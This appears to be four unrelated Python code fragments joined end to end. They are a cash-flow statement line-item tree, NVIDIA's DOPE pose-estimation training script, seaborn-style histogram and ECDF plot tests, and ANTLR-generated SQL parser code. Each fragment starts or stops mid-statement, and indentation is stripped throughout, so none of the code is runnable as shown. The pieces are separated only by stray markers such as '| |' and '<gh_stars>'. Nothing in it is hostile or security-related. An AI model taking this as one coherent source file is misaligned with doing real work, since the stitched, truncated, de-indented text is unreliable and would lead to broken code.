self.cf_tid_8 = line_item(' (Increase) Decrease in Accounts Receivable',
10,
parent=self.cf_tid_7)
self.cf_tid_9 = line_item(' (Increase) Decrease in Inventories',
11,
parent=self.cf_tid_7)
self.cf_tid_10 = line_item(' Increase (Decrease) in Accounts Payable',
12,
parent=self.cf_tid_7)
self.cf_tid_11 = line_item(' Increase (Decrease) in Other',
13,
parent=self.cf_tid_7)
#########################################
## Cash From Operating Children, Other ##
#########################################
self.cf_tid_12 = line_item('Net Cash From Discontinued Operations (operating)',
14,
parent=self.cf_tid_13)
self.cf_tid_2 = line_item('Depreciation & Amortization',
4,
parent=self.cf_tid_13)
####################################
## Cash From Investing Activities ##
####################################
self.cf_tid_31 = line_item('Cash from Investing Activities',
34,
parent=self.cf_tid_56)
###################################################
## Fixed Asset/Intangibles Activity and Children ##
###################################################
self.cf_tid_14 = line_item('Change in Fixed Assets & Intangibles',
16,
parent=self.cf_tid_31)
#######################################
## Continued, Disposition Acitivites ##
#######################################
self.cf_tid_15 = line_item(' Disposition of Fixed Assets & Intangibles',
17,
parent=self.cf_tid_14)
self.cf_tid_16 = line_item(' Disposition of Fixed Assets',
18,
parent=self.cf_tid_15)
self.cf_tid_17 = line_item(' Disposition of Intangible Assets',
19,
parent=self.cf_tid_15)
#######################################
## Continued, Acquisition Acitivites ##
#######################################
self.cf_tid_18 = line_item(' Acquisition of Fixed Assets & Intangibles',
20,
parent=self.cf_tid_14)
self.cf_tid_19 = line_item(' Purchase of Fixed Assets',
21,
parent=self.cf_tid_18)
self.cf_tid_20 = line_item(' Acquisition of Intangible Assets',
22,
parent=self.cf_tid_18)
self.cf_tid_21 = line_item(' Other Change in Fixed Assets & Intangibles',
23,
parent=self.cf_tid_14)
#########################################
## LT Investment Activity and Children ##
#########################################
self.cf_tid_22 = line_item('Net Change in Long Term Investment',
24,
parent=self.cf_tid_31)
self.cf_tid_23 = line_item( 'Decrease in Long Term Investment',
25,
parent=self.cf_tid_22)
self.cf_tid_24 = line_item(' Increase in Long Term Investment',
26,
parent=self.cf_tid_22)
#################################
## M & A Activity and Children ##
#################################
self.cf_tid_25 = line_item('Net Cash From Acquisitions & Divestitures',
27,
parent=self.cf_tid_31)
self.cf_tid_26 = line_item(' Net Cash from Divestitures',
28,
parent=self.cf_tid_25)
self.cf_tid_27 = line_item(' Cash for Acqusition of Subsidiaries',
29,
parent=self.cf_tid_25)
self.cf_tid_28 = line_item(' Cash for Joint Ventures',
30,
parent=self.cf_tid_25)
self.cf_tid_50 = line_item(' Net Cash from Other Acquisitions',
31,
parent=self.cf_tid_25)
#########################################
## Cash From Investing Children, Other ##
#########################################
self.cf_tid_29 = line_item('Other Investing Activities',
32,
parent=self.cf_tid_31)
self.cf_tid_30 = line_item('Net Cash From Discontinued Operations (investing)',
33,
parent=self.cf_tid_31)
####################################
## Cash From Financing Activities ##
####################################
self.cf_tid_43 = line_item('Cash from Financing Activities',
46,
parent=self.cf_tid_56)
##########################################
## Debt Financing Activity and Children ##
##########################################
self.cf_tid_33 = line_item('Cash From (Repayment of) Debt',
36,
parent=self.cf_tid_43)
self.cf_tid_34 = line_item('Cash From (Repayment of) Short Term Debt, net',
37,
parent=self.cf_tid_33)
###################################
## Continued, LT Debt Acitivites ##
###################################
self.cf_tid_35 = line_item(' Cash From (Repayment of) Long Term Debt, net',
38,
parent=self.cf_tid_33)
self.cf_tid_36 = line_item(' Repayments of Long Term Debt',
39,
parent=self.cf_tid_35)
self.cf_tid_37 = line_item(' Cash From Long Term Debt',
40,
parent=self.cf_tid_35)
############################################
## Equity Financing Activity and Children ##
############################################
self.cf_tid_38 = line_item('Cash From (Repurchase of) Equity',
41,
parent=self.cf_tid_43)
self.cf_tid_39 = line_item(' Increase in Capital Stock',
42,
parent=self.cf_tid_38)
self.cf_tid_40 = line_item(' Decrease in Capital Stock',
43,
parent=self.cf_tid_38)
#########################################
## Cash From Financing Children, Other ##
#########################################
self.cf_tid_32 = line_item('Dividends Paid',
35,
parent=self.cf_tid_43)
self.cf_tid_41 = line_item('Other Financing Activities',
44,
parent=self.cf_tid_43)
self.cf_tid_42 = line_item('Net Cash From Discontinued Operations (financing)',
45,
parent=self.cf_tid_43)
if data:
self.add_data(data)
class balance_sheet(financial_statement):
''' __init__ will | |
<gh_stars>0
#!/usr/bin/env python3
# Copyright (c) 2018 NVIDIA Corporation. All rights reserved.
# This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
# https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode
from __future__ import print_function
######################################################
"""
REQUIREMENTS:
simplejson==3.16.0
numpy==1.14.1
opencv_python==3.4.3.18
horovod==0.13.5
photutils==0.5
scipy==1.1.0
torch==0.4.0
pyquaternion==0.9.2
tqdm==4.25.0
pyrr==0.9.2
Pillow==5.2.0
torchvision==0.2.1
PyYAML==3.13
"""
######################################################
"""
HOW TO TRAIN DOPE
This is the DOPE training code.
It is provided as a convenience for researchers, but it is otherwise unsupported.
Please refer to `python3 train.py --help` for specific details about the
training code.
If you download the FAT dataset
(https://research.nvidia.com/publication/2018-06_Falling-Things)
you can train a YCB object DOPE detector as follows:
```
python3 train.py --data path/to/FAT --object soup --outf soup
--gpuids 0 1 2 3 4 5 6 7
```
This will create a folder called `train_soup` where the weights will be saved
after each epoch. It will use the 8 gpus using pytorch data parallel.
"""
import argparse
import configparser
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torchvision.transforms as transforms
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.models as models
import datetime
import json
import glob
import os
from PIL import Image
from PIL import ImageDraw
from PIL import ImageEnhance
from math import acos
from math import sqrt
from math import pi
from os.path import exists
import cv2
import colorsys
from dope.utils import make_grid
import warnings
warnings.filterwarnings("ignore")
os.environ["CUDA_VISIBLE_DEVICES"]="0,1,2,3,4,5,6,7"
##################################################
# NEURAL NETWORK MODEL
##################################################
class DopeNetwork(nn.Module):
def __init__(
self,
pretrained=False,
numBeliefMap=9,
numAffinity=16,
stop_at_stage=6 # number of stages to process (if less than total number of stages)
):
super(DopeNetwork, self).__init__()
self.stop_at_stage = stop_at_stage
if pretrained is False:
print("Training network without imagenet weights.")
else:
print("Training network pretrained on imagenet.")
vgg_full = models.vgg19(pretrained=pretrained).features
self.vgg = nn.Sequential()
for i_layer in range(24):
self.vgg.add_module(str(i_layer), vgg_full[i_layer])
# Add some layers
i_layer = 23
self.vgg.add_module(str(i_layer), nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=1))
self.vgg.add_module(str(i_layer+1), nn.ReLU(inplace=True))
self.vgg.add_module(str(i_layer+2), nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=1))
self.vgg.add_module(str(i_layer+3), nn.ReLU(inplace=True))
# print('---Belief------------------------------------------------')
# _2 are the belief map stages
self.m1_2 = DopeNetwork.create_stage(128, numBeliefMap, True)
self.m2_2 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numBeliefMap, False)
self.m3_2 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numBeliefMap, False)
self.m4_2 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numBeliefMap, False)
self.m5_2 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numBeliefMap, False)
self.m6_2 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numBeliefMap, False)
# print('---Affinity----------------------------------------------')
# _1 are the affinity map stages
self.m1_1 = DopeNetwork.create_stage(128, numAffinity, True)
self.m2_1 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numAffinity, False)
self.m3_1 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numAffinity, False)
self.m4_1 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numAffinity, False)
self.m5_1 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numAffinity, False)
self.m6_1 = DopeNetwork.create_stage(128 + numBeliefMap + numAffinity,
numAffinity, False)
def forward(self, x):
'''Runs inference on the neural network'''
out1 = self.vgg(x)
out1_2 = self.m1_2(out1)
out1_1 = self.m1_1(out1)
if self.stop_at_stage == 1:
return [out1_2],\
[out1_1]
out2 = torch.cat([out1_2, out1_1, out1], 1)
out2_2 = self.m2_2(out2)
out2_1 = self.m2_1(out2)
if self.stop_at_stage == 2:
return [out1_2, out2_2],\
[out1_1, out2_1]
out3 = torch.cat([out2_2, out2_1, out1], 1)
out3_2 = self.m3_2(out3)
out3_1 = self.m3_1(out3)
if self.stop_at_stage == 3:
return [out1_2, out2_2, out3_2],\
[out1_1, out2_1, out3_1]
out4 = torch.cat([out3_2, out3_1, out1], 1)
out4_2 = self.m4_2(out4)
out4_1 = self.m4_1(out4)
if self.stop_at_stage == 4:
return [out1_2, out2_2, out3_2, out4_2],\
[out1_1, out2_1, out3_1, out4_1]
out5 = torch.cat([out4_2, out4_1, out1], 1)
out5_2 = self.m5_2(out5)
out5_1 = self.m5_1(out5)
if self.stop_at_stage == 5:
return [out1_2, out2_2, out3_2, out4_2, out5_2],\
[out1_1, out2_1, out3_1, out4_1, out5_1]
out6 = torch.cat([out5_2, out5_1, out1], 1)
out6_2 = self.m6_2(out6)
out6_1 = self.m6_1(out6)
return [out1_2, out2_2, out3_2, out4_2, out5_2, out6_2],\
[out1_1, out2_1, out3_1, out4_1, out5_1, out6_1]
@staticmethod
def create_stage(in_channels, out_channels, first=False):
'''Create the neural network layers for a single stage.'''
model = nn.Sequential()
mid_channels = 128
if first:
padding = 1
kernel = 3
count = 6
final_channels = 512
else:
padding = 3
kernel = 7
count = 10
final_channels = mid_channels
# First convolution
model.add_module("0",
nn.Conv2d(
in_channels,
mid_channels,
kernel_size=kernel,
stride=1,
padding=padding)
)
# Middle convolutions
i = 1
while i < count - 1:
model.add_module(str(i), nn.ReLU(inplace=True))
i += 1
model.add_module(str(i),
nn.Conv2d(
mid_channels,
mid_channels,
kernel_size=kernel,
stride=1,
padding=padding))
i += 1
# Penultimate convolution
model.add_module(str(i), nn.ReLU(inplace=True))
i += 1
model.add_module(str(i), nn.Conv2d(mid_channels, final_channels, kernel_size=1, stride=1))
i += 1
# Last convolution
model.add_module(str(i), nn.ReLU(inplace=True))
i += 1
model.add_module(str(i), nn.Conv2d(final_channels, out_channels, kernel_size=1, stride=1))
i += 1
return model
##################################################
# UTILS CODE FOR LOADING THE DATA
##################################################
def default_loader(path):
return Image.open(path).convert('RGB')
def loadjson(path, objectsofinterest, img):
"""
Loads the data from a json file.
If there are no objects of interest, then load all the objects.
"""
with open(path) as data_file:
data = json.load(data_file)
# print (path)
pointsBelief = []
boxes = []
points_keypoints_3d = []
points_keypoints_2d = []
pointsBoxes = []
poses = []
centroids = []
translations = []
rotations = []
points = []
for i_line in range(len(data['objects'])):
info = data['objects'][i_line]
if not objectsofinterest is None and \
not objectsofinterest in info['class'].lower():
continue
box = info['bounding_box']
boxToAdd = []
boxToAdd.append(float(box['top_left'][0]))
boxToAdd.append(float(box['top_left'][1]))
boxToAdd.append(float(box["bottom_right"][0]))
boxToAdd.append(float(box['bottom_right'][1]))
boxes.append(boxToAdd)
boxpoint = [(boxToAdd[0],boxToAdd[1]),(boxToAdd[0],boxToAdd[3]),
(boxToAdd[2],boxToAdd[1]),(boxToAdd[2],boxToAdd[3])]
pointsBoxes.append(boxpoint)
# 3dbbox with belief maps
points3d = []
pointdata = info['projected_cuboid']
for p in pointdata:
points3d.append((p[0],p[1]))
# Get the centroids
pcenter = info['projected_cuboid_centroid']
points3d.append ((pcenter[0],pcenter[1]))
pointsBelief.append(points3d)
points.append (points3d + [(pcenter[0],pcenter[1])])
centroids.append((pcenter[0],pcenter[1]))
# load translations
location = info['location']
translations.append([location[0],location[1],location[2]])
# quaternion
rot = info["quaternion_xyzw"]
rotations.append(rot)
return {
"pointsBelief":pointsBelief,
"rotations":rotations,
"translations":translations,
"centroids":centroids,
"points":points,
"keypoints_2d":points_keypoints_2d,
"keypoints_3d":points_keypoints_3d,
}
def loadimages(root):
"""
Find all the images in the path and folders, return them in imgs.
"""
imgs = []
def add_json_files(path,):
for imgpath in glob.glob(path+"/*.png"):
if exists(imgpath) and exists(imgpath.replace('png',"json")):
imgs.append((imgpath,imgpath.replace(path,"").replace("/",""),
imgpath.replace('png',"json")))
for imgpath in glob.glob(path+"/*.jpg"):
if exists(imgpath) and exists(imgpath.replace('jpg',"json")):
imgs.append((imgpath,imgpath.replace(path,"").replace("/",""),
imgpath.replace('jpg',"json")))
def explore(path):
if not os.path.isdir(path):
return
folders = [os.path.join(path, o) for o in os.listdir(path)
if os.path.isdir(os.path.join(path,o))]
if len(folders)>0:
for path_entry in folders:
explore(path_entry)
else:
add_json_files(path)
explore(root)
return imgs
class MultipleVertexJson(data.Dataset):
"""
Dataloader for the data generated by NDDS (https://github.com/NVIDIA/Dataset_Synthesizer).
This is the same data as the data used in FAT.
"""
def __init__(self, root,transform=None, nb_vertex = 8,
keep_orientation = True,
normal = None, test=False,
target_transform = None,
loader = default_loader,
objectsofinterest = "",
img_size = 400,
save = False,
noise = 2,
data_size = None,
sigma = 16,
random_translation = (25.0,25.0),
random_rotation = 15.0,
):
###################
self.objectsofinterest = objectsofinterest
self.img_size = img_size
self.loader = loader
self.transform = transform
self.target_transform = target_transform
self.root = root
self.imgs = []
self.test = test
self.normal = normal
self.keep_orientation = keep_orientation
self.save = save
self.noise = noise
self.data_size = data_size
self.sigma = sigma
self.random_translation = random_translation
self.random_rotation = random_rotation
def load_data(path):
'''Recursively load the data. This is useful to load all of the FAT dataset.'''
imgs = loadimages(path)
# Check all the folders in path
for name in os.listdir(str(path)):
imgs += loadimages(path +"/"+name)
return imgs
self.imgs = load_data(root)
# Shuffle the data, this is useful when we want to use a subset.
np.random.shuffle(self.imgs)
def __len__(self):
# When limiting the number of data
if not self.data_size is None:
return int(self.data_size)
return len(self.imgs)
def __getitem__(self, index):
"""
Depending on how the data loader is configured,
this will return the debug info with the cuboid drawn on it,
this happens when self.save is set to true.
Otherwise, during training this function returns the
belief maps and affinity fields and image as tensors.
"""
path, name, txt = self.imgs[index]
img = self.loader(path)
img_size = img.size
img_size = (400,400)
loader = loadjson
data = loader(txt, self.objectsofinterest,img)
pointsBelief = data['pointsBelief']
objects_centroid = data['centroids']
points_all = data['points']
points_keypoints = data['keypoints_2d']
translations = torch.from_numpy(np.array(
data['translations'])).float()
rotations = torch.from_numpy(np.array(
data['rotations'])).float()
if len(points_all) == 0:
points_all = torch.zeros(1, 10, 2).double()
# self.save == true assumes there is only
# one object instance in the scene.
if translations.size()[0] > 1:
translations = translations[0].unsqueeze(0)
rotations = rotations[0].unsqueeze(0)
# If there are no objects, still need to return similar shape array
if len(translations) == 0:
translations = torch.zeros(1,3).float()
rotations = torch.zeros(1,4).float()
# Camera intrinsics
path_cam = path.replace(name,'_camera_settings.json')
with open(path_cam) as data_file:
data = json.load(data_file)
# Assumes one camera
cam = data['camera_settings'][0]['intrinsic_settings']
matrix_camera = np.zeros((3,3))
matrix_camera[0,0] = cam['fx']
matrix_camera[1,1] = cam['fy']
matrix_camera[0,2] = cam['cx']
matrix_camera[1,2] = cam['cy']
matrix_camera[2,2] = 1
# Load | |
= 10
histplot(flat_series, element="bars", fill=False, bins=n, ax=ax1)
histplot(flat_series, element="poly", fill=False, bins=n, ax=ax2)
bar_heights = np.array([b.get_height() for b in ax1.patches])
bar_widths = np.array([b.get_width() for b in ax1.patches])
bar_edges = np.array([b.get_x() for b in ax1.patches])
x, y = ax2.lines[0].get_xydata().T
assert_array_equal(x, bar_edges + bar_widths / 2)
assert_array_equal(y, bar_heights)
def test_step_no_fill(self, flat_series):
f, (ax1, ax2) = plt.subplots(2)
histplot(flat_series, element="bars", fill=False, ax=ax1)
histplot(flat_series, element="step", fill=False, ax=ax2)
bar_heights = [b.get_height() for b in ax1.patches]
bar_widths = [b.get_width() for b in ax1.patches]
bar_edges = [b.get_x() for b in ax1.patches]
x, y = ax2.lines[0].get_xydata().T
assert_array_equal(x[:-1], bar_edges)
assert_array_equal(y[:-1], bar_heights)
assert x[-1] == bar_edges[-1] + bar_widths[-1]
assert y[-1] == y[-2]
def test_step_fill_xy(self, flat_series):
f, ax = plt.subplots()
histplot(x=flat_series, element="step", fill=True)
histplot(y=flat_series, element="step", fill=True)
xverts = ax.collections[0].get_paths()[0].vertices
yverts = ax.collections[1].get_paths()[0].vertices
assert_array_equal(xverts, yverts[:, ::-1])
def test_step_no_fill_xy(self, flat_series):
f, ax = plt.subplots()
histplot(x=flat_series, element="step", fill=False)
histplot(y=flat_series, element="step", fill=False)
xline, yline = ax.lines
assert_array_equal(xline.get_xdata(), yline.get_ydata())
assert_array_equal(xline.get_ydata(), yline.get_xdata())
def test_weighted_histogram(self):
ax = histplot(x=[0, 1, 2], weights=[1, 2, 3], discrete=True)
bar_heights = [b.get_height() for b in ax.patches]
assert bar_heights == [1, 2, 3]
def test_weights_with_auto_bins(self, long_df):
with pytest.warns(UserWarning):
ax = histplot(long_df, x="x", weights="f")
assert len(ax.patches) == 10
def test_shrink(self, long_df):
bw = 2
shrink = .5
ax = histplot(long_df, x="x", binwidth=bw, shrink=shrink)
assert ax.patches[0].get_width() == bw * shrink
def test_log_scale_explicit(self, rng):
x = rng.lognormal(0, 2, 1000)
ax = histplot(x, log_scale=True, binwidth=1)
bar_widths = [b.get_width() for b in ax.patches]
steps = np.divide(bar_widths[1:], bar_widths[:-1])
assert np.allclose(steps, 10)
def test_log_scale_implicit(self, rng):
x = rng.lognormal(0, 2, 1000)
f, ax = plt.subplots()
ax.set_xscale("log")
histplot(x, binwidth=1, ax=ax)
bar_widths = [b.get_width() for b in ax.patches]
steps = np.divide(bar_widths[1:], bar_widths[:-1])
assert np.allclose(steps, 10)
@pytest.mark.parametrize(
"fill", [True, False],
)
def test_auto_linewidth(self, flat_series, fill):
get_lw = lambda ax: ax.patches[0].get_linewidth() # noqa: E731
kws = dict(element="bars", fill=fill)
f, (ax1, ax2) = plt.subplots(2)
histplot(flat_series, **kws, bins=10, ax=ax1)
histplot(flat_series, **kws, bins=100, ax=ax2)
assert get_lw(ax1) > get_lw(ax2)
f, ax1 = plt.subplots(figsize=(10, 5))
f, ax2 = plt.subplots(figsize=(2, 5))
histplot(flat_series, **kws, bins=30, ax=ax1)
histplot(flat_series, **kws, bins=30, ax=ax2)
assert get_lw(ax1) > get_lw(ax2)
def test_bar_kwargs(self, flat_series):
lw = 2
ec = (1, .2, .9, .5)
ax = histplot(flat_series, binwidth=1, ec=ec, lw=lw)
for bar in ax.patches:
assert_colors_equal(bar.get_edgecolor(), ec)
assert bar.get_linewidth() == lw
def test_step_fill_kwargs(self, flat_series):
lw = 2
ec = (1, .2, .9, .5)
ax = histplot(flat_series, element="step", ec=ec, lw=lw)
poly = ax.collections[0]
assert_colors_equal(poly.get_edgecolor(), ec)
assert poly.get_linewidth() == lw
def test_step_line_kwargs(self, flat_series):
lw = 2
ls = "--"
ax = histplot(flat_series, element="step", fill=False, lw=lw, ls=ls)
line = ax.lines[0]
assert line.get_linewidth() == lw
assert line.get_linestyle() == ls
class TestHistPlotBivariate:
def test_mesh(self, long_df):
hist = Histogram()
counts, (x_edges, y_edges) = hist(long_df["x"], long_df["y"])
ax = histplot(long_df, x="x", y="y")
mesh = ax.collections[0]
mesh_data = mesh.get_array()
assert_array_equal(mesh_data.data, counts.T.flat)
assert_array_equal(mesh_data.mask, counts.T.flat == 0)
edges = itertools.product(y_edges[:-1], x_edges[:-1])
for i, (y, x) in enumerate(edges):
path = mesh.get_paths()[i]
assert path.vertices[0, 0] == x
assert path.vertices[0, 1] == y
def test_mesh_with_hue(self, long_df):
ax = histplot(long_df, x="x", y="y", hue="c")
hist = Histogram()
hist.define_bin_edges(long_df["x"], long_df["y"])
for i, sub_df in long_df.groupby("c"):
mesh = ax.collections[i]
mesh_data = mesh.get_array()
counts, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
assert_array_equal(mesh_data.data, counts.T.flat)
assert_array_equal(mesh_data.mask, counts.T.flat == 0)
edges = itertools.product(y_edges[:-1], x_edges[:-1])
for i, (y, x) in enumerate(edges):
path = mesh.get_paths()[i]
assert path.vertices[0, 0] == x
assert path.vertices[0, 1] == y
def test_mesh_with_hue_unique_bins(self, long_df):
ax = histplot(long_df, x="x", y="y", hue="c", common_bins=False)
for i, sub_df in long_df.groupby("c"):
hist = Histogram()
mesh = ax.collections[i]
mesh_data = mesh.get_array()
counts, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
assert_array_equal(mesh_data.data, counts.T.flat)
assert_array_equal(mesh_data.mask, counts.T.flat == 0)
edges = itertools.product(y_edges[:-1], x_edges[:-1])
for i, (y, x) in enumerate(edges):
path = mesh.get_paths()[i]
assert path.vertices[0, 0] == x
assert path.vertices[0, 1] == y
def test_mesh_log_scale(self, rng):
x, y = rng.lognormal(0, 1, (2, 1000))
hist = Histogram()
counts, (x_edges, y_edges) = hist(np.log10(x), np.log10(y))
ax = histplot(x=x, y=y, log_scale=True)
mesh = ax.collections[0]
mesh_data = mesh.get_array()
assert_array_equal(mesh_data.data, counts.T.flat)
edges = itertools.product(y_edges[:-1], x_edges[:-1])
for i, (y_i, x_i) in enumerate(edges):
path = mesh.get_paths()[i]
assert path.vertices[0, 0] == 10 ** x_i
assert path.vertices[0, 1] == 10 ** y_i
def test_mesh_thresh(self, long_df):
hist = Histogram()
counts, (x_edges, y_edges) = hist(long_df["x"], long_df["y"])
thresh = 5
ax = histplot(long_df, x="x", y="y", thresh=thresh)
mesh = ax.collections[0]
mesh_data = mesh.get_array()
assert_array_equal(mesh_data.data, counts.T.flat)
assert_array_equal(mesh_data.mask, (counts <= thresh).T.flat)
def test_mesh_sticky_edges(self, long_df):
ax = histplot(long_df, x="x", y="y", thresh=None)
mesh = ax.collections[0]
assert mesh.sticky_edges.x == [long_df["x"].min(), long_df["x"].max()]
assert mesh.sticky_edges.y == [long_df["y"].min(), long_df["y"].max()]
ax.clear()
ax = histplot(long_df, x="x", y="y")
mesh = ax.collections[0]
assert not mesh.sticky_edges.x
assert not mesh.sticky_edges.y
def test_mesh_common_norm(self, long_df):
stat = "density"
ax = histplot(
long_df, x="x", y="y", hue="c", common_norm=True, stat=stat,
)
hist = Histogram(stat="density")
hist.define_bin_edges(long_df["x"], long_df["y"])
for i, sub_df in long_df.groupby("c"):
mesh = ax.collections[i]
mesh_data = mesh.get_array()
density, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
scale = len(sub_df) / len(long_df)
assert_array_equal(mesh_data.data, (density * scale).T.flat)
def test_mesh_unique_norm(self, long_df):
stat = "density"
ax = histplot(
long_df, x="x", y="y", hue="c", common_norm=False, stat=stat,
)
hist = Histogram()
hist.define_bin_edges(long_df["x"], long_df["y"])
for i, sub_df in long_df.groupby("c"):
sub_hist = Histogram(bins=hist.bin_edges, stat=stat)
mesh = ax.collections[i]
mesh_data = mesh.get_array()
density, (x_edges, y_edges) = sub_hist(sub_df["x"], sub_df["y"])
assert_array_equal(mesh_data.data, density.T.flat)
@pytest.mark.parametrize("stat", ["probability", "percent"])
def test_mesh_normalization(self, long_df, stat):
ax = histplot(
long_df, x="x", y="y", stat=stat,
)
mesh_data = ax.collections[0].get_array()
expected_sum = {"probability": 1, "percent": 100}[stat]
assert mesh_data.data.sum() == expected_sum
def test_mesh_colors(self, long_df):
color = "r"
f, ax = plt.subplots()
histplot(
long_df, x="x", y="y", color=color,
)
mesh = ax.collections[0]
assert_array_equal(
mesh.get_cmap().colors,
_DistributionPlotter()._cmap_from_color(color).colors,
)
f, ax = plt.subplots()
histplot(
long_df, x="x", y="y", hue="c",
)
colors = color_palette()
for i, mesh in enumerate(ax.collections):
assert_array_equal(
mesh.get_cmap().colors,
_DistributionPlotter()._cmap_from_color(colors[i]).colors,
)
def test_color_limits(self, long_df):
f, (ax1, ax2, ax3) = plt.subplots(3)
kws = dict(data=long_df, x="x", y="y")
hist = Histogram()
counts, _ = hist(long_df["x"], long_df["y"])
histplot(**kws, ax=ax1)
assert ax1.collections[0].get_clim() == (0, counts.max())
vmax = 10
histplot(**kws, vmax=vmax, ax=ax2)
counts, _ = hist(long_df["x"], long_df["y"])
assert ax2.collections[0].get_clim() == (0, vmax)
pmax = .8
pthresh = .1
f = _DistributionPlotter()._quantile_to_level
histplot(**kws, pmax=pmax, pthresh=pthresh, ax=ax3)
counts, _ = hist(long_df["x"], long_df["y"])
mesh = ax3.collections[0]
assert mesh.get_clim() == (0, f(counts, pmax))
assert_array_equal(
mesh.get_array().mask,
(counts <= f(counts, pthresh)).T.flat,
)
def test_hue_color_limits(self, long_df):
_, (ax1, ax2, ax3, ax4) = plt.subplots(4)
kws = dict(data=long_df, x="x", y="y", hue="c", bins=4)
hist = Histogram(bins=kws["bins"])
hist.define_bin_edges(long_df["x"], long_df["y"])
full_counts, _ = hist(long_df["x"], long_df["y"])
sub_counts = []
for _, sub_df in long_df.groupby(kws["hue"]):
c, _ = hist(sub_df["x"], sub_df["y"])
sub_counts.append(c)
pmax = .8
pthresh = .05
f = _DistributionPlotter()._quantile_to_level
histplot(**kws, common_norm=True, ax=ax1)
for i, mesh in enumerate(ax1.collections):
assert mesh.get_clim() == (0, full_counts.max())
histplot(**kws, common_norm=False, ax=ax2)
for i, mesh in enumerate(ax2.collections):
assert mesh.get_clim() == (0, sub_counts[i].max())
histplot(**kws, common_norm=True, pmax=pmax, pthresh=pthresh, ax=ax3)
for i, mesh in enumerate(ax3.collections):
assert mesh.get_clim() == (0, f(full_counts, pmax))
assert_array_equal(
mesh.get_array().mask,
(sub_counts[i] <= f(full_counts, pthresh)).T.flat,
)
histplot(**kws, common_norm=False, pmax=pmax, pthresh=pthresh, ax=ax4)
for i, mesh in enumerate(ax4.collections):
assert mesh.get_clim() == (0, f(sub_counts[i], pmax))
assert_array_equal(
mesh.get_array().mask,
(sub_counts[i] <= f(sub_counts[i], pthresh)).T.flat,
)
def test_colorbar(self, long_df):
f, ax = plt.subplots()
histplot(long_df, x="x", y="y", cbar=True, ax=ax)
assert len(ax.figure.axes) == 2
f, (ax, cax) = plt.subplots(2)
histplot(long_df, x="x", y="y", cbar=True, cbar_ax=cax, ax=ax)
assert len(ax.figure.axes) == 2
class TestECDFPlotUnivariate(SharedAxesLevelTests):
func = staticmethod(ecdfplot)
def get_last_color(self, ax):
return to_rgb(ax.lines[-1].get_color())
@pytest.mark.parametrize("variable", ["x", "y"])
def test_long_vectors(self, long_df, variable):
vector = long_df[variable]
vectors = [
variable, vector, vector.to_numpy(), vector.to_list(),
]
f, ax = plt.subplots()
for vector in vectors:
ecdfplot(data=long_df, ax=ax, **{variable: vector})
xdata = [l.get_xdata() for l in ax.lines]
for a, b in itertools.product(xdata, xdata):
assert_array_equal(a, b)
ydata = [l.get_ydata() for l in ax.lines]
for a, b in itertools.product(ydata, ydata):
assert_array_equal(a, b)
def test_hue(self, long_df):
ax = ecdfplot(long_df, x="x", hue="a")
for line, color in zip(ax.lines[::-1], color_palette()):
assert_colors_equal(line.get_color(), color)
def test_line_kwargs(self, long_df):
color = "r"
ls = "--"
lw = 3
ax = ecdfplot(long_df, x="x", color=color, ls=ls, lw=lw)
for line in ax.lines:
assert_colors_equal(line.get_color(), color)
assert line.get_linestyle() == ls
assert line.get_linewidth() == lw
@pytest.mark.parametrize("data_var", ["x", "y"])
def test_drawstyle(self, flat_series, data_var):
ax = ecdfplot(**{data_var: flat_series})
drawstyles = dict(x="steps-post", y="steps-pre")
assert ax.lines[0].get_drawstyle() == drawstyles[data_var]
@pytest.mark.parametrize(
"data_var,stat_var", [["x", "y"], ["y", "x"]],
)
def test_proportion_limits(self, flat_series, data_var, stat_var):
ax = ecdfplot(**{data_var: flat_series})
data = getattr(ax.lines[0], f"get_{stat_var}data")()
assert data[0] == 0
assert data[-1] == 1
sticky_edges = getattr(ax.lines[0].sticky_edges, stat_var)
assert sticky_edges[:] == [0, 1]
@pytest.mark.parametrize(
"data_var,stat_var", [["x", "y"], ["y", "x"]],
)
def | |
localctx = SQLGramaticaParser.ShowColumnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_showColumns)
try:
self.enterOuterAlt(localctx, 1)
self.state = 401
self.match(SQLGramaticaParser.SHOW)
self.state = 402
self.match(SQLGramaticaParser.COLUMNS)
self.state = 403
self.match(SQLGramaticaParser.FROM)
self.state = 404
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class InsertIntoContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.InsertIntoContext, self).__init__(parent, invokingState)
self.parser = parser
def INSERT(self):
return self.getToken(SQLGramaticaParser.INSERT, 0)
def INTO(self):
return self.getToken(SQLGramaticaParser.INTO, 0)
def IDX(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.IDX)
else:
return self.getToken(SQLGramaticaParser.IDX, i)
def VALUES(self):
return self.getToken(SQLGramaticaParser.VALUES, 0)
def literal(self, i=None):
if i is None:
return self.getTypedRuleContexts(SQLGramaticaParser.LiteralContext)
else:
return self.getTypedRuleContext(SQLGramaticaParser.LiteralContext,i)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_insertInto
def enterRule(self, listener):
if hasattr(listener, "enterInsertInto"):
listener.enterInsertInto(self)
def exitRule(self, listener):
if hasattr(listener, "exitInsertInto"):
listener.exitInsertInto(self)
def accept(self, visitor):
if hasattr(visitor, "visitInsertInto"):
return visitor.visitInsertInto(self)
else:
return visitor.visitChildren(self)
def insertInto(self):
